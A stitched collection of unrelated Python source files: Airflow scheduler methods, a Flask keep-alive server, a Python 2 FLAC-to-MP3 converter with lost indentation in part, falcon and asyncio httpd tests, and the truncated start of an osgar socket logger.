        {TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
    )
    # Also drop them from the executor's in-memory queue.
    for task_instance in tis_to_set_to_scheduled:
        self.executor.queued_tasks.pop(task_instance.key)

    task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
    self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
    """
    Respond to executor events.

    Reads the executor's event buffer, records external executor ids for
    newly QUEUED TIs, and fires a task callback when the executor reports a
    TI finished while the DB still says it is QUEUED (likely killed externally).

    :return: number of events that were in the buffer
    """
    if not self.processor_agent:
        raise ValueError("Processor agent is not started.")
    ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
    event_buffer = self.executor.get_event_buffer()
    tis_with_right_state: List[TaskInstanceKey] = []

    # Report execution
    for ti_key, value in event_buffer.items():
        state: str
        state, _ = value
        # We create map (dag_id, task_id, execution_date) -> in-memory try_number
        ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number

        self.log.info(
            "Executor reports execution of %s.%s execution_date=%s "
            "exited with status %s for try_number %s",
            ti_key.dag_id,
            ti_key.task_id,
            ti_key.execution_date,
            state,
            ti_key.try_number,
        )
        if state in (State.FAILED, State.SUCCESS, State.QUEUED):
            tis_with_right_state.append(ti_key)

    # Return if no finished tasks
    if not tis_with_right_state:
        return len(event_buffer)

    # Check state of finished tasks
    filter_for_tis = TI.filter_for_tis(tis_with_right_state)
    tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
    for ti in tis:
        try_number = ti_primary_key_to_try_number_map[ti.key.primary]
        buffer_key = ti.key.with_try_number(try_number)
        # pop(): each buffered event is consumed exactly once.
        state, info = event_buffer.pop(buffer_key)

        # TODO: should we fail RUNNING as well, as we do in Backfills?
        if state == State.QUEUED:
            # Executor accepted the task; remember its external id.
            ti.external_executor_id = info
            self.log.info("Setting external_id for %s to %s", ti, info)
            continue

        if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
            # Executor says finished but DB still QUEUED -> killed externally?
            Stats.incr('scheduler.tasks.killed_externally')
            msg = (
                "Executor reports task instance %s finished (%s) although the "
                "task says its %s. (Info: %s) Was the task killed externally?"
            )
            self.log.error(msg, ti, state, ti.state, info)
            request = TaskCallbackRequest(
                full_filepath=ti.dag_model.fileloc,
                simple_task_instance=SimpleTaskInstance(ti),
                msg=msg % (ti, state, ti.state, info),
            )
            self.processor_agent.send_callback_to_execute(request)
    return len(event_buffer)
def _execute(self) -> None:
    """Run the scheduler: start executor + DAG-file processor agent, enter the
    scheduling loop, then tear everything down on exit or error."""
    self.log.info("Starting the scheduler")

    # DAGs can be pickled for easier remote execution by some executors
    pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS

    self.log.info("Processing each file at most %s times", self.num_times_parse_dags)

    # When using sqlite, we do not use async_mode
    # so the scheduler job and DAG parser don't access the DB at the same time.
    async_mode = not self.using_sqlite

    processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
    processor_timeout = timedelta(seconds=processor_timeout_seconds)
    self.processor_agent = DagFileProcessorAgent(
        dag_directory=self.subdir,
        max_runs=self.num_times_parse_dags,
        processor_factory=type(self)._create_dag_file_processor,
        processor_timeout=processor_timeout,
        dag_ids=[],
        pickle_dags=pickle_dags,
        async_mode=async_mode,
    )

    try:
        self.executor.job_id = self.id
        self.executor.start()

        self.register_signals()

        # Start after resetting orphaned tasks to avoid stressing out DB.
        self.processor_agent.start()

        execute_start_time = timezone.utcnow()

        self._run_scheduler_loop()

        # Stop any processors
        self.processor_agent.terminate()

        # Verify that all files were processed, and if so, deactivate DAGs that
        # haven't been touched by the scheduler as they likely have been
        # deleted.
        if self.processor_agent.all_files_processed:
            self.log.info(
                "Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
            )
            models.DAG.deactivate_stale_dags(execute_start_time)

        self.executor.end()

        settings.Session.remove()  # type: ignore
    except Exception:  # pylint: disable=broad-except
        # Top-level boundary: log and fall through to cleanup in finally.
        self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
    finally:
        self.processor_agent.end()
        self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
    file_path: str,
    callback_requests: List[CallbackRequest],
    dag_ids: Optional[List[str]],
    pickle_dags: bool,
) -> DagFileProcessorProcess:
    """Creates DagFileProcessorProcess instance."""
    # Thin factory used by the DagFileProcessorAgent; all arguments are
    # forwarded unchanged as keywords.
    return DagFileProcessorProcess(
        file_path=file_path,
        dag_ids=dag_ids,
        pickle_dags=pickle_dags,
        callback_requests=callback_requests,
    )
def _run_scheduler_loop(self) -> None:
    """
    The actual scheduler loop. The main steps in the loop are:

    #. Harvest DAG parsing results through DagFileProcessorAgent
    #. Find and queue executable tasks
    #. Change task instance state in DB
    #. Queue tasks in executor
    #. Heartbeat executor
    #. Execute queued tasks in executor asynchronously
    #. Sync on the states of running tasks

    Following is a graphic representation of these steps.

    .. image:: ../docs/apache-airflow/img/scheduler_loop.jpg

    :rtype: None
    """
    if not self.processor_agent:
        raise ValueError("Processor agent is not started.")
    is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')

    # Non-blocking sched-based timer wheel for periodic maintenance tasks.
    timers = sched.scheduler()

    def call_regular_interval(
        delay: float,
        action: Callable,
        arguments=(),
        kwargs={},
    ):  # pylint: disable=dangerous-default-value
        # Run `action` now-ish and re-schedule it `delay` seconds after each run.
        def repeat(*args, **kwargs):
            action(*args, **kwargs)
            # This is not perfect. If we want a timer every 60s, but action
            # takes 10s to run, this will run it every 70s.
            # Good enough for now
            timers.enter(delay, 1, repeat, args, kwargs)

        timers.enter(delay, 1, repeat, arguments, kwargs)

    # Check on start up, then every configured interval
    self.adopt_or_reset_orphaned_tasks()

    call_regular_interval(
        conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
        self.adopt_or_reset_orphaned_tasks,
    )

    call_regular_interval(
        conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
        self._emit_pool_metrics,
    )

    call_regular_interval(
        conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
        self._clean_tis_without_dagrun,
    )

    for loop_count in itertools.count(start=1):
        with Stats.timer() as timer:

            if self.using_sqlite:
                self.processor_agent.run_single_parsing_loop()
                # For the sqlite case w/ 1 thread, wait until the processor
                # is finished to avoid concurrent access to the DB.
                self.log.debug("Waiting for processors to finish since we're using sqlite")
                self.processor_agent.wait_until_finished()

            with create_session() as session:
                num_queued_tis = self._do_scheduling(session)

                self.executor.heartbeat()
                session.expunge_all()
                num_finished_events = self._process_executor_events(session=session)

            self.processor_agent.heartbeat()

            # Heartbeat the scheduler periodically
            self.heartbeat(only_if_necessary=True)

            # Run any pending timed events
            next_event = timers.run(blocking=False)
            self.log.debug("Next timed event is in %f", next_event)

        self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)

        if not is_unit_test and not num_queued_tis and not num_finished_events:
            # If the scheduler is doing things, don't sleep. This means when there is work to do, the
            # scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
            # usage when "idle"
            time.sleep(min(self._processor_poll_interval, next_event))

        if loop_count >= self.num_runs > 0:
            self.log.info(
                "Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
                self.num_runs,
                loop_count,
            )
            break
        if self.processor_agent.done:
            self.log.info(
                "Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
                " scheduler loops",
                self.num_times_parse_dags,
                loop_count,
            )
            break
@provide_session
def _clean_tis_without_dagrun(self, session):
    """Move TIs with no backing DagRun out of waiting states:
    UP_FOR_RETRY -> FAILED, other waiting states -> None."""
    with prohibit_commit(session) as guard:
        try:
            self._change_state_for_tis_without_dagrun(
                old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
            )

            self._change_state_for_tis_without_dagrun(
                old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
                new_state=State.NONE,
                session=session,
            )

            guard.commit()
        except OperationalError as e:
            if is_lock_not_available_error(error=e):
                # Another scheduler holds the lock; back off and try next time.
                self.log.debug("Lock held by another Scheduler")
                session.rollback()
            else:
                raise
        guard.commit()
def _do_scheduling(self, session) -> int:
    """
    This function is where the main scheduling decisions take places. It:

    - Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel

      Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
      (configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
      mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
      scheduling tasks.

    - Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
      via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
      to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)

      By "next oldest", we mean hasn't been examined/scheduled in the most time.

      The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
      that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
      limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
      (>500 tasks.) DAGs

    - Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
      to the executor.

      See docs of _critical_section_execute_task_instances for more.

    :return: Number of TIs enqueued in this iteration
    :rtype: int
    """
    # Put a check in place to make sure we don't commit unexpectedly
    with prohibit_commit(session) as guard:

        if settings.USE_JOB_SCHEDULE:
            query = DagModel.dags_needing_dagruns(session)
            self._create_dag_runs(query.all(), session)

            # commit the session - Release the write lock on DagModel table.
            guard.commit()
            # END: create dagruns

        dag_runs = DagRun.next_dagruns_to_examine(session)

        # Bulk fetch the currently active dag runs for the dags we are
        # examining, rather than making one query per DagRun

        # TODO: This query is probably horribly inefficient (though there is an
        # index on (dag_id,state)). It is to deal with the case when a user
        # clears more than max_active_runs older tasks -- we don't want the
        # scheduler to suddenly go and start running tasks from all of the
        # runs. (AIRFLOW-137/GH #1442)
        #
        # The longer term fix would be to have `clear` do this, and put DagRuns
        # in to the queued state, then take DRs out of queued before creating
        # any new ones

        # Build up a set of execution_dates that are "active" for a given
        # dag_id -- only tasks from those runs will be scheduled.
        active_runs_by_dag_id = defaultdict(set)

        query = (
            session.query(
                TI.dag_id,
                TI.execution_date,
            )
            .filter(
                TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
                TI.state.notin_(list(State.finished) + [State.REMOVED]),
            )
            .group_by(TI.dag_id, TI.execution_date)
        )

        for dag_id, execution_date in query:
            active_runs_by_dag_id[dag_id].add(execution_date)

        for dag_run in dag_runs:
            self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)

        guard.commit()

        # Without this, the session has an invalid view of the DB
        session.expunge_all()
        # END: schedule TIs

        try:
            if self.executor.slots_available <= 0:
                # We know we can't do anything here, so don't even try!
                self.log.debug("Executor full, skipping critical section")
                return 0

            timer = Stats.timer('scheduler.critical_section_duration')
            timer.start()

            # Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
            num_queued_tis = self._critical_section_execute_task_instances(session=session)

            # Make sure we only sent this metric if we obtained the lock, otherwise we'll skew the
            # metric, way down
            timer.stop(send=True)
        except OperationalError as e:
            timer.stop(send=False)

            if is_lock_not_available_error(error=e):
                self.log.debug("Critical section lock held by another Scheduler")
                Stats.incr('scheduler.critical_section_busy')
                session.rollback()
                return 0
            raise

        guard.commit()
        return num_queued_tis
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
    """
    Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
    if/when the next DAGRun should be created
    """
    for dag_model in dag_models:
        dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
        dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
        # One SCHEDULED run per dag, at the pre-computed next_dagrun date.
        dag.create_dagrun(
            run_type=DagRunType.SCHEDULED,
            execution_date=dag_model.next_dagrun,
            start_date=timezone.utcnow(),
            state=State.RUNNING,
            external_trigger=False,
            session=session,
            dag_hash=dag_hash,
            creating_job_id=self.id,
        )

    # Advance next_dagrun/next_dagrun_create_after for everything just created.
    self._update_dag_next_dagruns(dag_models, session)

    # TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
    # memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
    """
    Bulk update the next_dagrun and next_dagrun_create_after for all the dags.

    We batch the select queries to get info about all the dags at once
    """
    # Check max_active_runs, to see if we are _now_ at the limit for any of
    # these dag? (we've just created a DagRun for them after all)
    active_runs_of_dags = dict(
        session.query(DagRun.dag_id, func.count('*'))
        .filter(
            DagRun.dag_id.in_([o.dag_id for o in dag_models]),
            DagRun.state == State.RUNNING,  # pylint: disable=comparison-with-callable
            DagRun.external_trigger.is_(False),
        )
        .group_by(DagRun.dag_id)
        .all()
    )

    for dag_model in dag_models:
        dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
        active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
        if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
            self.log.info(
                "DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
                dag.dag_id,
                active_runs_of_dag,
                dag.max_active_runs,
            )
            # None here blocks further run creation until a run finishes.
            dag_model.next_dagrun_create_after = None
        else:
            dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
                dag_model.next_dagrun
            )
def _schedule_dag_run(
    self,
    dag_run: DagRun,
    currently_active_runs: Set[datetime.datetime],
    session: Session,
) -> int:
    """
    Make scheduling decisions about an individual dag run

    ``currently_active_runs`` is passed in so that a batch query can be
    used to ask this for all dag runs in the batch, to avoid an n+1 query.

    :param dag_run: The DagRun to schedule
    :param currently_active_runs: Execution dates of currently active runs of this DAG
    :return: Number of tasks scheduled
    """
    dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)

    if not dag:
        self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
        return 0

    # Fail the whole run if it has exceeded the DAG's dagrun_timeout.
    if (
        dag_run.start_date
        and dag.dagrun_timeout
        and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
    ):
        dag_run.state = State.FAILED
        dag_run.end_date = timezone.utcnow()
        self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
        session.flush()

        # Work out if we should allow creating a new DagRun now?
        self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)

        callback_to_execute = DagCallbackRequest(
            full_filepath=dag.fileloc,
            dag_id=dag.dag_id,
            execution_date=dag_run.execution_date,
            is_failure_callback=True,
            msg='timed_out',
        )

        # Send SLA & DAG Success/Failure Callbacks to be executed
        self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)

        return 0

    if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
        self.log.error("Execution date is in future: %s", dag_run.execution_date)
        return 0

    # Respect max_active_runs, unless this run is already one of the active ones.
    if dag.max_active_runs:
        if (
            len(currently_active_runs) >= dag.max_active_runs
            and dag_run.execution_date not in currently_active_runs
        ):
            self.log.info(
                "DAG %s already has %d active runs, not queuing any tasks for run %s",
                dag.dag_id,
                len(currently_active_runs),
                dag_run.execution_date,
            )
            return 0

    self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
    # TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
    schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
    self._send_dag_callbacks_to_processor(dag_run, callback_to_run)

    # This will do one query per dag run. We "could" build up a complex
    # query to update all the TIs across all the execution dates and dag
    # IDs in a single query, but it turns out that can be _very very slow_
    # see #11147/commit ee90807ac for more details
    return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
    """Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
    latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)

    if dag_run.dag_hash != latest_version:
        # Structure changed: record the new hash, reload the DAG, re-verify.
        dag_run.dag_hash = latest_version

        # Refresh the DAG
        dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)

        # Verify integrity also takes care of session.flush
        dag_run.verify_integrity(session=session)
    else:
        self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
def _send_dag_callbacks_to_processor(
    self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
    """Forward SLA callbacks for the run's DAG, plus an optional DAG-level callback."""
    if not self.processor_agent:
        raise ValueError("Processor agent is not started.")

    self._send_sla_callbacks_to_processor(dag_run.get_dag())
    if callback:
        self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
    """Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
    if not settings.CHECK_SLAS:
        return

    # Only DAGs where at least one task defines an SLA need a callback.
    dag_has_slas = any(isinstance(task.sla, timedelta) for task in dag.tasks)
    if not dag_has_slas:
        self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
        return

    if not self.processor_agent:
        raise ValueError("Processor agent is not started.")
    self.processor_agent.send_sla_callback_request_to_execute(
        full_filepath=dag.fileloc, dag_id=dag.dag_id
    )
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
    """Publish open/queued/running slot gauges for every pool."""
    pool_stats = models.Pool.slots_stats(session=session)
    for pool_name in pool_stats:
        slot_stats = pool_stats[pool_name]
        Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
        Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
        Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
    """Emit the scheduler_heartbeat counter each time the job heartbeats."""
    Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
    """
    Reset any TaskInstance still in QUEUED or SCHEDULED states that were
    enqueued by a SchedulerJob that is no longer running.

    :return: the number of TIs reset
    :rtype: int
    """
    self.log.info("Resetting orphaned tasks for active dag runs")
    timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')

    # First, mark any RUNNING SchedulerJob with a stale heartbeat as FAILED.
    num_failed = (
        session.query(SchedulerJob)
        .filter(
            SchedulerJob.state == State.RUNNING,
            SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
        )
        .update({"state": State.FAILED})
    )

    if num_failed:
        self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
        Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)

    resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
    query = (
        session.query(TI)
        .filter(TI.state.in_(resettable_states))
        # outerjoin is because we didn't use to have queued_by_job
        # set, so we need to pick up anything pre upgrade. This (and the
        # "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
        # released.
        .outerjoin(TI.queued_by_job)
        .filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
        .join(TI.dag_run)
        .filter(
            DagRun.run_type != DagRunType.BACKFILL_JOB,
            # pylint: disable=comparison-with-callable
            DagRun.state == State.RUNNING,
        )
        .options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
    )

    # Lock these rows, so that another scheduler can't try and adopt these too
    tis_to_reset_or_adopt = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
    to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)

    # TIs the executor could NOT adopt are reset to state None.
    reset_tis_message = []
    for ti in to_reset:
        reset_tis_message.append(repr(ti))
        ti.state = State.NONE
        ti.queued_by_job_id = None

    # TIs the executor adopted are re-tagged as queued by this job.
    for ti in set(tis_to_reset_or_adopt) - set(to_reset):
        ti.queued_by_job_id = self.id

    Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
    Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))

    if to_reset:
        task_instance_str = '\n\t'.join(reset_tis_message)
        self.log.info(
            "Reset the following %s orphaned TaskInstances:\n\t%s", len(to_reset), task_instance_str
        )

    # Issue SQL/finish "Unit of Work", but let @provide_session commit (or if passed a session, let caller
    # decide when to commit
    session.flush()
    return len(to_reset)
|
websever.py | # used to run 24/7 on repl.it
from flask import Flask
from threading import Thread
app = Flask('')


@app.route('/')
def home():
    """Health-check endpoint polled by the uptime service."""
    return "Bot is online!"


def run():
    """Serve the Flask app; 0.0.0.0 so the host is reachable externally."""
    app.run(host='0.0.0.0', port=8080)


def keep_alive():
    """Start the web server on a background thread and return immediately."""
    server_thread = Thread(target=run)
    server_thread.start()
toMP3.py | #!/usr/bin/env python
# encoding: utf-8
import os
import sys
import subprocess
import time
import platform
import multiprocessing as mp
global root_dir
def print_sysinfo():
    # Dump interpreter and host platform details.
    # NOTE: Python 2 print statements — this whole script is Python 2 only.
    print '\nPython version : ' + platform.python_version()
    print 'compiler : ' + platform.python_compiler()

    print '\nsystem : ' + platform.system()
    print 'release : ' + platform.release()
    print 'machine : ' + platform.machine()
    print 'processor : ' + platform.processor()
    print 'CPU count : ' + str(mp.cpu_count())
    print 'interpreter: ' + platform.architecture()[0]
class bcolors:
    """ANSI escape sequences for colored/styled terminal output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset all attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
def searchFlacs(top):
    # Recursively walk `top`, print every *.flac found, and return them
    # as a list of (directory, filename) tuples.
    flacs = []
    print "Found:"
    for root, dirs, files in os.walk(top):
        # check if there are flacs in this folder
        flacsfound = False
        for name in files:
            if name.endswith((".flac")):
                flacsfound = True
                break
        if flacsfound:
            print root + " ::"
            for name in files:
                if name.endswith((".flac")):
                    print " - " + name
                    flacs.append((root, name))
    return flacs
def convert(files):
p_name = mp.current_process().name
FNULL = open('log.txt', 'w')
for dir, file in files:
oldfile = os.path.join(dir, file)
newfile = oldfile.replace(".flac", ".mp3")
#print "Processing: " + oldfile.replace(root_dir, '')
try:
start = time.time()
retcode = subprocess.call(["ffmpeg", "-n", "-i", oldfile, "-qscale:a", "0", newfile], stdout=FNULL, stderr=subprocess.STDOUT)
elapsed = time.time() - start
if os.path.isfile(newfile):
print p_name + ": " + oldfile.replace(root_dir, ''),
print bcolors.OKBLUE + " ... in %s s" % (round(elapsed, 3)) + bcolors.ENDC
else:
print p_name + ": " + oldfile.replace(root_dir, ''),
print bcolors.FAIL + "\n ...ERROR occured! Check log.txt for details!" + bcolors.ENDC
except OSError:
print "Error starting ffmpeg. Did you install ffmpeg and add it to your PATH?"
print ""
raise
return 0
def chunks(l, n):
    """Yield successive n-sized slices of l; the last one may be shorter."""
    for start in range(0, len(l), n):
        yield l[start:start + n]
if __name__ == '__main__':
assert len(sys.argv) >= 2, 'Please specify an input folder!'
root_dir = sys.argv[1]
start_overall = time.time()
files = searchFlacs(root_dir)
#convert(files, root_dir)
files_chunks = list(chunks(files, len(files)/4))
jobs = []
for chunk in files_chunks:
p = mp.Process(target=convert, args=(chunk,))
jobs.append(p)
p.start()
#wait for jobs to complete
for p in jobs:
p.join()
elapsed_overall = time.time() - start_overall
print bcolors.BOLD + "Processed all files in %s s" % (round(elapsed_overall, 3)) + bcolors.ENDC
print_sysinfo()
|
falcon_test.py | import pytest
from multiprocessing import Process
from common import send_requests, mode_list, kwargs_list
def server_process(port, mode, **kwargs):
    """Run a minimal Falcon app serving GET /hello/world with swagger docs attached.

    Executed in a child process; imports are local so only the child needs falcon.
    Blocks forever in serve_forever() — the parent terminates the process.
    """
    import json
    import falcon
    from distutils.version import StrictVersion
    from wsgiref import simple_server

    class HelloWorldResource(object):
        def on_get(self, req, resp):
            resp.body = json.dumps({'text': 'Hello World!!!'})

    # falcon renamed its application class API -> App in 3.0.
    if StrictVersion(falcon.__version__) < StrictVersion('3.0.0'):
        app = falcon.API()
    else:
        app = falcon.App()
    app.add_route('/hello/world', HelloWorldResource())

    # 'auto' exercises the framework-detecting entry point; otherwise use
    # the falcon-specific one.
    if mode == 'auto':
        from swagger_ui import api_doc
        api_doc(app, **kwargs)
    else:
        from swagger_ui import falcon_api_doc
        falcon_api_doc(app, **kwargs)

    httpd = simple_server.make_server('localhost', port, app)
    httpd.serve_forever()
@pytest.mark.parametrize('mode', mode_list)
@pytest.mark.parametrize('kwargs', kwargs_list)
def test_falcon(port, mode, kwargs):
    """Start the falcon app in a subprocess and exercise the doc endpoints."""
    # NOTE(review): empty/root url_prefix combinations are skipped here —
    # presumably unsupported for falcon; confirm against common.kwargs_list.
    if kwargs['url_prefix'] in ('', '/'):
        return
    proc = Process(target=server_process, args=(port, mode), kwargs=kwargs)
    proc.start()
    # send_requests raises on failure, which leaves the test failed before
    # terminate(); the child is killed either way when the test ends.
    send_requests(port, mode, kwargs)
    proc.terminate()
|
test_httpd.py | import asyncio
import threading
from unittest import TestCase
import urllib.request
from rx import Observable
from rx.subjects import Subject
import cyclotron_aio.httpd as httpd
class HttpdServerTestCase(TestCase):
    """Integration tests for the cyclotron_aio httpd driver.

    Each test builds a fresh asyncio event loop, feeds control items through
    the Sink subject, and stops the loop from inside the driver's observable
    callbacks once the expected lifecycle event arrives.
    """

    def test_start_server_item(self):
        # StartServer is a record type: host and port are mandatory.
        self.assertRaises(TypeError, httpd.StartServer)
        item = httpd.StartServer(host='localhost', port=80)
        self.assertEqual('localhost', item.host)
        self.assertEqual(80, item.port)

    def test_start_server(self):
        # Start a server, then stop it as soon as ServerStarted is observed.
        loop = asyncio.new_event_loop()
        loop.set_debug(True)
        asyncio.set_event_loop(loop)
        sink = httpd.Sink(
            control = Subject()
        )

        def on_httpd_item(i):
            if type(i) is httpd.ServerStarted:
                sink.control.on_next(httpd.StopServer())
            elif type(i) == httpd.ServerStopped:
                # ServerStopped ends the test: stop the loop.
                asyncio.get_event_loop().stop()

        def control_stream(sink):
            sink.control.on_next(httpd.Initialize())
            sink.control.on_next(httpd.StartServer(host='localhost', port=9999))

        loop.call_soon(control_stream, sink)
        source = httpd.make_driver(loop).call(sink)
        source.server.subscribe(on_httpd_item)
        loop.run_forever()
        loop.close()

    def test_add_route(self):
        # Register several routes and check they are all echoed back as
        # RouteAdded items with matching path/id and an Observable request.
        routes = [
            httpd.AddRoute(methods=['GET'], path='/foo', id='foo'),
            httpd.AddRoute(methods=['POST'], path='/bar', id='bar'),
            httpd.AddRoute(methods=['PUT'], path='/biz', id='biz'),
        ]
        actual_routes = []
        loop = asyncio.new_event_loop()
        loop.set_debug(True)
        asyncio.set_event_loop(loop)
        sink = httpd.Sink(control=Subject())

        def setup(sink):
            sink.control.on_next(httpd.Initialize()),
            sink.control.on_next(httpd.StartServer(host='localhost', port=9999)),
            for route in routes:
                sink.control.on_next(route)

        def on_route_item(i):
            if type(i) is httpd.RouteAdded:
                actual_routes.append(i)
                # stop mainloop when last route is created
                if i.id == routes[-1].id:
                    asyncio.get_event_loop().stop()

        loop.call_soon(setup, sink)
        source = httpd.make_driver(loop).call(sink)
        source.route.subscribe(on_route_item)
        loop.run_forever()
        loop.close()

        self.assertEqual(len(routes), len(actual_routes))
        for index, route in enumerate(actual_routes):
            self.assertEqual(routes[index].path, route.path)
            self.assertEqual(routes[index].id, route.id)
            self.assertIsInstance(route.request, Observable)

    def test_get(self):
        # Full round-trip: GET /foo from a client thread, answer b'foo'
        # from the route observable, then stop the server and the loop.
        client_thread = None
        response = None
        loop = asyncio.new_event_loop()
        loop.set_debug(True)
        asyncio.set_event_loop(loop)
        sink = httpd.Sink(control=Subject())

        def setup(sink):
            sink.control.on_next(httpd.Initialize()),
            sink.control.on_next(httpd.AddRoute(
                methods=['GET'], path='/foo', id='foo'))
            sink.control.on_next(httpd.StartServer(host='localhost', port=8080)),

        def do_get():
            # Runs on the client thread; blocking urlopen is fine there.
            nonlocal response
            req = urllib.request.urlopen('http://localhost:8080/foo')
            response = req.read()

        # todo rxpy threadpool
        client_thread = threading.Thread(target=do_get)

        def on_server_item(i):
            if type(i) is httpd.ServerStarted:
                # Only issue the GET once the server is actually listening.
                nonlocal client_thread
                client_thread.start()
            elif type(i) == httpd.ServerStopped:
                asyncio.get_event_loop().stop()

        def on_route_item(i):
            sink.control.on_next(httpd.Response(context=i.context, data=b'foo'))
            loop.call_soon(sink.control.on_next, httpd.StopServer())

        loop.call_soon(setup, sink)
        source = httpd.make_driver(loop).call(sink)
        source.route \
            .filter(lambda i : i.id == 'foo') \
            .flat_map(lambda i: i.request) \
            .subscribe(on_route_item)
        source.server \
            .subscribe(on_server_item)
        loop.run_forever()
        loop.close()
        client_thread.join()

        self.assertEqual(b'foo', response)
|
logsocket.py | """
Wrapper & timestamper of input/out over socket
"""
import socket
import urllib.request
from threading import Thread
from osgar.logger import LogWriter
from osgar.bus import BusShutdownException
class LogSocket:
    """Base socket driver: publishes received bytes on the bus as 'raw'
    and sends bus 'raw' messages out through the socket.

    Concrete subclasses implement _send() for their transport.
    """

    def __init__(self, socket, config, bus):
        bus.register('raw')
        self.verbose = False
        self.socket = socket
        # Daemon threads so a blocked socket cannot hang interpreter shutdown.
        self.input_thread = Thread(target=self.run_input, daemon=True)
        self.output_thread = Thread(target=self.run_output, daemon=True)

        host = config.get('host')
        port = config.get('port')
        self.pair = (host, port)  # (None, None) for unknown address
        if 'timeout' in config:
